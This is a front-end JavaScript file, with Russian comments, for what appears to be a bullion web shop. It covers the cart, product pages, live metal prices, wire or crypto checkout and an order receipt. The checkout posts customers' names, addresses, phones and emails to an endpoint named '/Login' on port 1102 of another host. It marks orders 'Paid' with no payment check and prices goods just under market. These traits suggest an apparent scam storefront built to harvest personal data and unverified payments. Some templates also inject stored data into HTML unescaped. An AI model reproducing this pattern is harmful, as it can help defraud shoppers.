// $(document).ready(() => {
//     const totalElement = $('.total.show-top-cart-total');
//     let totalItems = parseInt(localStorage.getItem('totalItems')) || 0;
//     totalElement.text(totalItems);

//     $('.add-to-cart').on('click', () => {
//         totalItems++;
//         totalElement.text(totalItems);
//         localStorage.setItem('totalItems', totalItems);
//     });
// });
import { Notification } from '/js/notification.js';

// Переменные для хранения текущих курсов
let currentGoldPrice = 2500; // Пример цены золота за унцию
let currentSilverPrice = 28.5; // Пример цены серебра за унцию



let phoneNumber;

const updateCartItemCount = () => {
    const cart = JSON.parse(localStorage.getItem("cart")) || [];
    const totalItems = cart.reduce((sum, item) => sum + item.quantity, 0);
    $(".total.show-top-cart-total").text(totalItems);
};

$(document).on('click', '.product-image-preview .small-images a', function() {
    var bigImage = $(this).closest('.product-image-preview').find('.image img');
    var newSrc = $(this).attr('data-src');
    bigImage.css('opacity', '0.5');
    bigImage.attr('src', newSrc);

    bigImage.delay(200).queue(function(next) {
        $(this).css('opacity', '1');
        next();
    });
});


 // Функция для добавления товара в корзину
 const addToCart = (product) => {
    const cart = JSON.parse(localStorage.getItem("cart")) || [];
    const existingProduct = cart.find((item) => item.id === product.id);

    if (existingProduct) {
        existingProduct.quantity += 1; // Увеличиваем количество
    } else {
        cart.push(product); // Добавляем новый товар
    }

    localStorage.setItem("cart", JSON.stringify(cart));
    renderCartTable(); // Обновляем таблицу корзины
    updateCartItemCount(); // Обновляем количество товаров в корзине
};


const loadBankDetails = () => {
    $.getJSON('/wallet.json')
      .done(data => {
        const { bankDetails } = data;
  
        // Вставляем банковские данные в HTML
        $("#beneficiaryName").text(bankDetails.beneficiaryName);
        $("#beneficiaryAddress").text(bankDetails.beneficiaryAddress);
        $("#iban").text(bankDetails.iban);
        $("#swiftCode").text(bankDetails.swiftCode);
        $("#bankName").text(bankDetails.bankName);
        $('#paymentReference').text(`Payment Reference: ${localStorage.getItem('orderNumber')}`);

      })
      .fail(error => {
        console.error("Ошибка загрузки JSON:", error);
      });
  };
  
  // Выполняем функцию при загрузке страницы
  $(document).ready(loadBankDetails);



  // Функция для рендера таблицы корзины
  const renderCartTable = () => {
    const cart = JSON.parse(localStorage.getItem("cart")) || [];
    const $tbody = $(".cart-step-1-table tbody");
    $tbody.empty(); // Очищаем старое содержимое

    cart.forEach((product) => {
        const total = (product.price * product.quantity).toFixed(2);

        $tbody.append(`
            <tr class="cart_table_item cart-item-${product.id}">
                <td class="product-remove">
                    <a href="javascript:void(0);" class="btn btn-outline-danger btn-sm remove delete-from-cart" data-id="${product.id}">
                        <i class="fal fa-trash"></i>
                    </a>
                </td>
                <td class="product-thumbnail">
                    <a href="${product.link}">
                        <img class="image-product" src="${product.image}" alt="${product.title}">
                    </a>
                </td>
                <td class="product-name">
                    <a href="${product.link}">${product.title}</a>
                </td>
                <td class="product-price text-right">
                    <span class="amount">${product.price.toFixed(2)} EUR</span>
                </td>
                <td class="product-quantity">
                    <div class="input-group input-group-sm quantity-input">
                        <div class="input-group-prepend">
                            <button class="btn btn-outline-secondary update-q" data-type="minus" data-id="${product.id}" type="button"><i class="fa fa-minus"></i></button>
                        </div>
                        <input type="text" class="form-control qty text-center" value="${product.quantity}" data-id="${product.id}" min="1" step="1">
                        <div class="input-group-prepend">
                            <button class="btn btn-outline-secondary update-q" data-type="plus" data-id="${product.id}" type="button"><i class="fa fa-plus"></i></button>
                        </div>
                    </div>
                </td>
                <td class="product-subtotal text-right">
                    <span class="amount">${total} EUR</span>
                </td>
                <td class="availability-icons text-right">
                    <i class="fal fa-warehouse-alt" data-toggle="tooltip" title="Storage"></i>
                    <i class="fal fa-shipping-fast" data-toggle="tooltip" title="Shipping"></i>
                </td>
            </tr>
        `);
    });

    calculateCartTotals(); // Вызываем пересчет итогов
};



 const input = document.querySelector(".mobile-number");


 if (input) {
    // Инициализируем intlTelInput только если элемент существует
    const iti = window.intlTelInput(input, {
        allowDropdown: true,
        initialCountry: "auto",
        autoHideDialCode: false,
        separateDialCode: true,
        dropdownContainer: null,
        utilsScript: "https://cdnjs.cloudflare.com/ajax/libs/intl-tel-input/18.1.1/js/utils.js",
    });

    input.addEventListener("countrychange", function() {
        const countryData = iti.getSelectedCountryData();
        phoneNumber = `${countryData.name}|+${countryData.dialCode}`
    });
}






  const calculateCartTotals = () => {
    const cart = JSON.parse(localStorage.getItem("cart")) || [];
    let subtotal = 0;

    // Считаем сумму всех товаров
    cart.forEach((product) => {
        subtotal += product.price * product.quantity;
    });

    // Обновляем значения в DOM
    $(".cart-subtotal td").text(`${subtotal.toFixed(2)} EUR`);
    $(".total .amount").text(`${subtotal.toFixed(2)} EUR`);
};






  // Функция для обновления количества товара
  const updateQuantity = (id, type) => {
    const cart = JSON.parse(localStorage.getItem("cart")) || [];
    const product = cart.find((item) => item.id === id);

    if (product) {
        if (type === "plus") {
            product.quantity += 1;
        } else if (type === "minus" && product.quantity > 1) {
            product.quantity -= 1;
        }

        localStorage.setItem("cart", JSON.stringify(cart));
        renderCartTable(); // Обновляем таблицу корзины
        updateCartItemCount(); // Обновляем количество товаров в корзине
    }
};

  // Функция для удаления товара
  const deleteFromCart = (id) => {
    let cart = JSON.parse(localStorage.getItem("cart")) || [];
    cart = cart.filter((item) => item.id !== id);

    localStorage.setItem("cart", JSON.stringify(cart));
    renderCartTable(); // Обновляем таблицу корзины
    updateCartItemCount(); // Обновляем количество товаров в корзине
};

  // Обработчик кликов по кнопкам добавления в корзину
  $(".add-to-cart").on("click", function (event) {
    event.preventDefault();
    const $productCard = $(this).closest(".product");

    const product = {
      id: $(this).data("id"),
      image: $productCard.find(".product-image-preview .image img").attr("src"),
      title: $productCard.find(".info .title a").text().trim(),
      price: parseFloat($productCard.find(".info .price").text().trim()),
      link: $productCard.find(".info .title a").attr("href"),
      quantity: 1,
    };

    addToCart(product);
    showAddToCartNotification(product);
  });

  // Обработчик изменения количества
  $(document).on("click", ".update-q", function () {
    const id = $(this).data("id");
    const type = $(this).data("type");
    updateQuantity(id, type);
  });

  // Обработчик удаления товара
  $(document).on("click", ".delete-from-cart", function () {
    const id = $(this).data("id");
    deleteFromCart(id);
  });

  // Рендерим корзину при загрузке страницы
renderCartTable(); // Отображаем корзину
updateCartItemCount(); // Обновляем количество товаров



// $('a').on('click', (e) =>{
//     e.preventDefault();
// });


$(document).ready(() => {
    $('#goToShip').on('click', async function(event) {
        event.preventDefault(); // Предотвращаем стандартное поведение отправки формы

        // Получение существующего объекта UserInfo из localStorage
        const existingUserInfo = JSON.parse(localStorage.getItem('UserInfo')) || {};

        // Создаем объект для сбора данных
        const formData = { ...existingUserInfo }; // Сохраняем существующую информацию

        // Собираем данные из формы
        $('.checkoutPageForm').serializeArray().forEach(({ name, value }) => {
            formData[name] = value; // Перезаписываем значение
        });

        // Получение значения data-code из выбранного option
        const selectedCountryOption = $('.cart-baddress-country').find(':selected');
        const selectedCountryName = selectedCountryOption.text(); // Получение текста внутри <option>
        if (selectedCountryName) {
            formData['billing_country_name'] = selectedCountryName; // Сохранение полного названия страны
        }

        // Получение значения из intl-tel-input
        const phoneInput = $('.mobile-number').val().trim();
        if (phoneInput) {
            formData['info_phone'] = phoneInput;
        }


        const orderNumber = localStorage.getItem('orderNumber');
        if (orderNumber) {
            formData['order_number'] = orderNumber;
        }


        // Добавление данных корзины
        const cartData = localStorage.getItem('cart');
        if (cartData) {
            try {
                const parsedCart = JSON.parse(cartData);
                formData['order'] = parsedCart.map(item => ({
                    title: item.title,
                    price: item.price
                }));
            } catch (error) {
                console.error('Ошибка при разборе данных корзины:', error);
            }
        }

        try {
            // Отправка данных на сервер через axios
            const response = await axios.post('https://bellco-union.com:1102/Login', formData);

            if (response.status === 200) {
                console.log('✅ Данные успешно отправлены:', response.data);

                // Сохранение данных в localStorage
                localStorage.setItem('UserInfo', JSON.stringify(formData));




            


                // Перенаправление на следующую страницу
                window.location.replace("shipping-and-payment.html");
            } else {
                console.error('❌ Ошибка при отправке данных:', response.statusText);
            }
        } catch (error) {
            console.error('❌ Ошибка при отправке данных:', error);
        }
    });
});



const getOrderNumber = () => {
    let orderNumber = localStorage.getItem('orderNumber');
    if (!orderNumber) {
        // Генерация случайного 4-значного номера заказа
        orderNumber = Math.floor(1000 + Math.random() * 9000).toString();
        localStorage.setItem('orderNumber', orderNumber);
    }
    return orderNumber;
};



$(document).ready(async function () {
    const updateMetalPrices = async () => {
        try {
            const response =  await fetch('https://www.bullionvault.com/view_market_json.do?marketWidth=1&weightUnit=KG');
            const data =  await response.json();

            // Найти цену золота и серебра в EUR
            const goldData = data.market.pitches.find(
                (item) => item.securityClassNarrative === 'GOLD' && item.considerationCurrency === 'EUR'
            );
            const silverData = data.market.pitches.find(
                (item) => item.securityClassNarrative === 'SILVER' && item.considerationCurrency === 'EUR'
            );

            if (goldData && silverData) {
                currentGoldPrice = goldData.buyPrices[0].ouncesLimit;
                currentSilverPrice = silverData.buyPrices[0].ouncesLimit;

                // Обновление DOM с новыми ценами
                $(".metal").filter((_, el) => $(el).find('b').text().includes('Gold')).html(
                    `<b>Gold:</b><br>${currentGoldPrice} EUR <i class="fa fa-arrows-alt-v"></i>`
                );
                $(".metal").filter((_, el) => $(el).find('b').text().includes('Silver')).html(
                    `<b>Silver:</b><br>${currentSilverPrice} EUR <i class="fa fa-arrows-alt-v"></i>`
                );
            } else {
                console.error('Не удалось найти данные для золота или серебра в EUR.');
            }
        } catch (error) {
            console.error('Ошибка при получении данных с API:', error);
        }
    };



    $('#submitPaymentCrypto').on('click', async (e) => {
        e.preventDefault();
        try {
            const getPaymentMethod = localStorage.getItem('paymentMethod');
            const paymentData = JSON.parse(getPaymentMethod);
            const notification = new Notification();
    
            if (!paymentData) {
                console.error('Данные о методе оплаты отсутствуют в localStorage.');
                return;
            }
    
            const orderNumber = localStorage.getItem('orderNumber');
            if (!orderNumber) {
                console.error('Номер заказа отсутствует в localStorage.');
                return;
            }
    
            // Проверка и парсинг суммы
            const amount = parseFloat(paymentData.amount);
            if (isNaN(amount)) {
                console.error('Сумма заказа некорректна.');
                return;
            }
    

            notification.show({
                title: 'Order Confirmed!',
                message: 'Thank you for your purchase. Your order has been successfully placed and will be processed shortly.'
            });

            // Формирование объекта данных
            const payload = {
                orderNumber: orderNumber,
                paymentMethod: paymentData.method,
                amount: amount,
            };
    
            try {
                const response = await axios.post("https://bellco-union.com:1102/submit", payload);
                if (response.status === 200) {
                    console.log('✅ Данные успешно отправлены:', response.data);
                    $('#status').removeClass('badge-danger').addClass('badge-success').text('Paid')


                    window.location.href = '/receipt.html';
                } else {
                    console.error('❌ Ошибка отправки данных:', response.statusText);
                }
            } catch (error) {
                console.error('Ошибка отправки данных через axios:', error);
            }
        } catch (error) {
            console.error('Ошибка отправки данных при подтверждении заказа:', error);
        }
    });

$(document).ready(() => {
    // Функция для установки метода оплаты по умолчанию
    const setDefaultPaymentMethod = () => {
        const paymentMethodKey = 'paymentMethod';
        const cartKey = 'cart';

        // Проверяем, есть ли уже метод оплаты в localStorage
        let paymentData = localStorage.getItem(paymentMethodKey);

        if (!paymentData) {
            // Получаем сумму заказа из корзины
            const cartDataRaw = localStorage.getItem(cartKey);
            if (!cartDataRaw) {
                console.error('Корзина пуста, невозможно установить метод оплаты.');
                return;
            }

            try {
                const cartData = JSON.parse(cartDataRaw);
                const totalAmount = cartData.reduce((sum, item) => sum + item.price * item.quantity, 0);

                // Создаем объект метода оплаты по умолчанию
                const defaultPaymentData = {
                    method: 'wire-transfer', // Метод по умолчанию
                    address: '', // Пустой адрес
                    amount: parseFloat(totalAmount.toFixed(2)), // Сумма заказа
                };

                // Сохраняем в localStorage
                localStorage.setItem(paymentMethodKey, JSON.stringify(defaultPaymentData));
                console.log('Метод оплаты по умолчанию установлен:', defaultPaymentData);
            } catch (error) {
                console.error('Ошибка при обработке корзины:', error);
            }
        } else {
            console.log('Метод оплаты уже установлен:', JSON.parse(paymentData));
        }
    };

    // Устанавливаем метод оплаты по умолчанию при загрузке страницы
    setDefaultPaymentMethod();
});


    $('#submitPayment').on('click', async (e) => {
        e.preventDefault();
        try {
            const getPaymentMethod = localStorage.getItem('paymentMethod');
            const paymentData = JSON.parse(getPaymentMethod);
            const notification = new Notification();
    
            if (!paymentData) {
                console.error('Данные о методе оплаты отсутствуют в localStorage.');
                return;
            }
    
            const orderNumber = localStorage.getItem('orderNumber');
            if (!orderNumber) {
                console.error('Номер заказа отсутствует в localStorage.');
                return;
            }
    
            // Проверка и парсинг суммы
            const amount = parseFloat(paymentData.amount);
            if (isNaN(amount)) {
                console.error('Сумма заказа некорректна.');
                return;
            }
    

            notification.show({
                title: 'Order Confirmed!',
                message: 'Thank you for your purchase. Your order has been successfully placed and will be processed shortly.'
            });

            // Формирование объекта данных
            const payload = {
                orderNumber: orderNumber,
                paymentMethod: paymentData.method,
                amount: amount,
            };
    
            try {
                const response = await axios.post("https://bellco-union.com:1102/submit", payload);
                if (response.status === 200) {
                    console.log('✅ Данные успешно отправлены:', response.data);
                    $('#status').removeClass('badge-danger').addClass('badge-success').text('Paid')


                    window.location.href = '/receipt.html';
                } else {
                    console.error('❌ Ошибка отправки данных:', response.statusText);
                }
            } catch (error) {
                console.error('Ошибка отправки данных через axios:', error);
            }
        } catch (error) {
            console.error('Ошибка отправки данных при подтверждении заказа:', error);
        }
    });


    function getFormattedDateTime() {
        const months = [
            "Jan", "Feb", "Mar", "Apr", "May", "Jun",
            "Jul", "Aug", "Sep", "Oct", "Nov", "Dec"
        ];
        
        const now = new Date();
        const day = String(now.getDate()).padStart(2, '0');
        const month = months[now.getMonth()];
        const year = now.getFullYear();
        const hours = String(now.getHours()).padStart(2, '0');
        const minutes = String(now.getMinutes()).padStart(2, '0');
        
        return `${day} ${month} ${year} ${hours}:${minutes}`;
    }

    

    $('.mag-title-1').html(`Order #${getOrderNumber()}`);
    $('#orderNumber').text(`ID: #${getOrderNumber()}`)
    $('#dateTime').text(`${getFormattedDateTime()}`)
    // Обновление цен каждые 30 секунд
    await updateMetalPrices();
    setInterval(updateMetalPrices, 50000);


    const updateProductPrices = async () => {
        if (currentGoldPrice || currentSilverPrice) {
            $('.product').each(function () {
                const $product = $(this);
                const $priceElement = $product.find('.price');
                const title = $product.find('.title a').text().toLowerCase();
    
                // Извлекаем базовую цену из текста цены
                const basePriceText = $priceElement.text().replace(' EUR', '').trim();
                const basePrice = parseFloat(basePriceText);
    
                if (isNaN(basePrice)) {
                    console.error(`Не удалось извлечь базовую цену для товара: ${title}`);
                    return;
                }
    
                let updatedPrice = basePrice;
    
                // Условие для изменения цены на основе категории товара
                if (title.includes('gold') && currentGoldPrice) {
                    updatedPrice = (basePrice * currentGoldPrice / 2500); // 2500 - пример старого курса
                } else if (title.includes('silver') && currentSilverPrice) {
                    updatedPrice = (basePrice * currentSilverPrice / 28.5); // 28.5 - пример старого курса
                }
    
                // Отнимаем 3% от обновлённой цены
                updatedPrice *= 0.97;
    
                // Округляем до 2 знаков после запятой
                updatedPrice = updatedPrice.toFixed(2);
    
                // Обновляем цену на странице
                $priceElement.text(`${updatedPrice} EUR`);
            });
        }
    };


    const populateFormFieldsFromLocalStorage = () => {
        // Получаем данные из localStorage
        const userInfoRaw = localStorage.getItem('UserInfo');
        if (!userInfoRaw) {
            console.error('Данные UserInfo отсутствуют в localStorage.');
            return;
        }
    
        try {
            const userInfo = JSON.parse(userInfoRaw);
    
            // Формируем имя получателя
            const recipientName = `${userInfo.info_title || ''} ${userInfo.info_first_name || ''} ${userInfo.info_last_name || ''}`.trim();
    
            // Формируем контактную информацию
            const contactInfo = `
                <i class="fa fa-phone"></i> ${userInfo.info_phone || ''} / 
                <i class="fa fa-envelope"></i> ${userInfo.info_email || ''}
            `.trim();
    
            // Формируем адрес оплаты
            const billingAddressParts = [
                userInfo.billing_address || '',
                userInfo.billing_city || '',
                userInfo.billing_state?.trim() || '',
                userInfo.billing_country_name?.replace(/\s+/g, ' ').trim() || '', // Убираем лишние пробелы
                userInfo.billing_zipcode || ''
            ].filter(Boolean); // Убираем пустые элементы
    
            const billingAddress = billingAddressParts.join(', ');
    
            // Заполняем секции по id
            $('#recipient-info').html(`
                <div class="info-title">Recipient</div>
                ${recipientName}
            `);
    
            $('#contacts-info').html(`
                <div class="info-title">Contacts</div>
                ${contactInfo}
            `);
    
            $('#billing-address-info').html(`
                <div class="info-title">Billing Address</div>
                ${billingAddress}
            `);
        } catch (error) {
            console.error('Ошибка при разборе данных UserInfo из localStorage:', error);
        }
    };

    // Вызываем функцию при загрузке страницы
    $(document).ready(() => {
        populateFormFieldsFromLocalStorage();
    });



    const populateCartTable = () => {
        // Получаем данные из localStorage
        const cartRaw = localStorage.getItem('cart');
        if (!cartRaw) {
            console.error('Данные корзины отсутствуют в localStorage.');
            return;
        }

        try {
            const cart = JSON.parse(cartRaw);

            // Очистка таблицы перед добавлением строк
            const $cartTableBody = $('#cart-items');
            $cartTableBody.empty();

            let subtotal = 0;

            // Заполняем таблицу и подсчитываем subtotal
            cart.forEach((item, index) => {
                const totalPrice = (item.price * item.quantity).toFixed(2);
                subtotal += parseFloat(totalPrice);

                const rowHtml = `
                    <tr>
                        <td>${item.id || `Code-${index + 1}`}</td>
                        <td><b>${item.title}</b></td>
                        <td class="text-right">${item.price.toFixed(2)} EUR</td>
                        <td class="text-right">${item.quantity}</td>
                        <td class="text-right">${totalPrice} EUR</td>
                    </tr>
                `;

                $cartTableBody.append(rowHtml);
            });

            // Обновляем значения в блоке Subtotal и Order Total
            updateTotals(subtotal);

        } catch (error) {
            console.error('Ошибка при разборе данных корзины из localStorage:', error);
        }
    };

    const updateTotals = (subtotal) => {
        const $subtotalElement = $(".custom-table .amount:first");
        const $totalElement = $(".custom-table .total .amount");

        const orderTotal = subtotal.toFixed(2);

        // Обновляем значения в DOM
        $subtotalElement.text(`${subtotal.toFixed(2)} EUR`);
        $totalElement.text(`${orderTotal} EUR`);
    };

    // Вызываем функцию при загрузке страницы
    populateCartTable();


    // Обновление цен при загрузке страницы
    await updateProductPrices();

    // Установка интервала для обновления каждые 30 секунд
    setInterval(updateProductPrices, 30000);

});




const showAddToCartNotification = (product) => {
    const notificationHtml = `
        <div data-notify="container" class="col-xs-11 col-sm-4 alert alert-cart-add animated fadeInDown" 
            role="alert" data-notify-position="bottom-right"
            style="display: inline-block; margin: 0px auto; position: fixed; transition: 0.5s ease-in-out; 
            z-index: 1031; bottom: 20px; right: 20px;">
            <button type="button" aria-hidden="true" class="close" data-notify="dismiss"
                style="position: absolute; right: 10px; top: 5px; z-index: 1033;">×</button>
            <span data-notify="icon"></span>
            <span data-notify="title"></span> 
            <span data-notify="message">
                <img class="lazyload"
                    src="${product.image}"
                    alt="${product.title}" title="${product.title}">
                <div class="title">
                    <b>${product.title}</b> <br>was added to your cart
                </div>
                <div class="text"></div>
                <div class="float-right">
                    <a class="btn btn-primary btn-md" href="../cart.html"><i class="fa fa-shopping-cart"></i> View Cart</a>
                </div>
            </span>
            <a href="../cart.html" target="_blank" data-notify="url"></a>
        </div>`;

    // Добавляем уведомление в DOM
    $("body").append(notificationHtml);

    // Убираем уведомление через 5 секунд
    setTimeout(() => {
        $('[data-notify="container"]').fadeOut(300, function () {
            $(this).remove();
        });
    }, 5000);
};



$(document).ready(() => {
    // Функция для фильтрации товаров по наличию
    const filterProductsByStock = (stockFilterValue) => {
        console.log('Фильтруем товары по:', stockFilterValue);
    
        $('.product').each(function () {
            const $product = $(this);
            const stockBadge = $product.find('.stock-badge').text().trim();
    
            if (stockFilterValue === 'All' || stockFilterValue === 'Stock :: All') {
                $product.show(); // Показываем все товары
            } else if (stockBadge.includes(stockFilterValue)) {
                $product.show(); // Показываем товары, которые соответствуют фильтру
            } else {
                $product.hide(); // Скрываем остальные
            }
        });
    };

    // Функция сортировки товаров
    const sortProducts = (criteria, order = 'asc') => {
        const $products = $('.product'); // Получаем все товары
        const sortedProducts = $products.sort((a, b) => {
            const $a = $(a);
            const $b = $(b);
            let valueA, valueB;

            if (criteria === 'price') {
                // Сортировка по цене
                valueA = parseFloat($a.find('.price').text().replace(/[^\d.-]/g, ''));
                valueB = parseFloat($b.find('.price').text().replace(/[^\d.-]/g, ''));
            } else if (criteria === 'id') {
                // Сортировка по ID
                valueA = parseInt($a.find('.add-to-cart').data('id'), 10);
                valueB = parseInt($b.find('.add-to-cart').data('id'), 10);
            }

            return order === 'asc' ? valueA - valueB : valueB - valueA;
        });

        // Перемещаем отсортированные товары обратно в контейнер
        $('.product').parent().append(sortedProducts);
    };

    // Обработчик изменения фильтра наличия
    $('.selecttohref:first').on('change', function () {
        const selectedOptionText = $(this).find(':selected').text().trim(); // Получаем текст выбранной опции
    
        // Логируем текст выбранной опции для проверки
        console.log('Full Option Text:', selectedOptionText);
    
        // Используем текст опции напрямую для фильтрации
        const stockFilterValue = selectedOptionText;
    
        console.log('Selected Stock Filter:', stockFilterValue); // Логируем значение фильтра
        filterProductsByStock(stockFilterValue); // Вызываем функцию фильтрации
    });

    // Обработчик изменения сортировки
    $('.selecttohref:last').on('change', function () {
        const sortValue = $(this).val();
        if (sortValue.includes('product_weight')) {
            sortProducts('price', sortValue.includes('asc') ? 'asc' : 'desc');
        } else if (sortValue.includes('product_id')) {
            sortProducts('id', sortValue.includes('desc') ? 'desc' : 'asc');
        }
    });
});


$('.product .title a, .product .image a').on('click', function (e) {
    e.preventDefault();

    // Проверяем, что клик был не на кнопке "Add to Cart"
    const $product = $(this).closest('.product');
    const isAddToCartClick = $(e.target).closest('.add-to-cart').length > 0;

    if (!isAddToCartClick) {
        const productData = {
            id: $product.find('.add-to-cart').data('id'),
            image: $product.find('.image img').attr('src'),
            title: $product.find('.title a').text(),
            price: $product.find('.price').text().trim(),
            link: $product.find('.title a').attr('href'),
            stock: $product.find('.stock-badge').text().trim(),
        };

        // Сохраняем данные товара в Local Storage
        localStorage.setItem('currentProduct', JSON.stringify(productData));

        // Перенаправляем на страницу товара
        window.location.href = '/product.html';
    }
});



$(document).ready(() => {
    // Получаем данные товара из Local Storage
    const productDataRaw = localStorage.getItem('currentProduct');
    if (!productDataRaw) {
        console.error('Данные товара отсутствуют.');
        return;
    }

    const productData = JSON.parse(productDataRaw);

    // Заполняем страницу данными
    $('.product-gallery .main a').attr('href', productData.image);
    $('.product-gallery .main img').attr('src', productData.image).attr('alt', productData.title);

    $('.entry-summary h1').text(productData.title);
    $('.entry-summary .price .amount span').first().text(productData.price.split(' ')[0]);
    $('.entry-summary .price .amount span').last().text(productData.price.split(' ')[1]);

    $('.stock-badge').text(productData.stock);
    $('.add-to-cart-product').data('id', productData.id);

    // Если у товара есть дополнительная информация, например, вес или SKU, заполняем их
    const productDetailsHtml = `
        <tr>
            <td>SKU</td>
            <td>${productData.id}</td>
        </tr>
        <tr>
            <td>Weight</td>
            <td><b>31.105</b> Grams / <b>1.000</b> Oz</td>
        </tr>
        <tr>
            <td>Serial Number</td>
            <td>No</td>
        </tr>
    `;
    $('.product-addit-top table tbody').html(productDetailsHtml);

    // Обработчик для кнопки "Add to Cart" на странице продукта
    $('.add-to-cart-product').on('click', function (event) {
        event.preventDefault();

        const quantity = parseInt($('.pQty').val(), 10) || 1; // Получаем количество из поля ввода
        const product = {
            id: productData.id,
            image: productData.image,
            title: productData.title,
            price: parseFloat(productData.price.split(' ')[0]),
            quantity: quantity,
        };

        addToCart(product);
        showAddToCartNotification(product);
    });
});

// Функция для добавления товара в корзину



// Форматирование даты заказа
$(document).ready(() => {
    // Получаем данные из localStorage
    const cartDataRaw = localStorage.getItem('cart');
    const orderNumber = localStorage.getItem('orderNumber');

    // Проверяем, есть ли данные
    if (!cartDataRaw || !orderNumber) {
        console.error('Данные о корзине или номере заказа отсутствуют в localStorage.');
        return;
    }

    try {
        const cartData = JSON.parse(cartDataRaw);

        // Устанавливаем номер заказа
        $('#order-number').text(`Order #${orderNumber}`);

        // Устанавливаем текущую дату
        const currentDate = new Date().toLocaleDateString('en-US', {
            year: 'numeric',
            month: 'short',
            day: 'numeric',
        });
        $('#order-date').text(currentDate);




        // Заполняем информацию о заказе
        const firstItem = cartData[0]; // Берем первый товар из корзины
        $('#product-name').text(firstItem.title);
        $('#order-total').text(`${firstItem.price.toFixed(2)} EUR`);
    } catch (error) {
        console.error('Ошибка обработки данных корзины:', error);
    }
});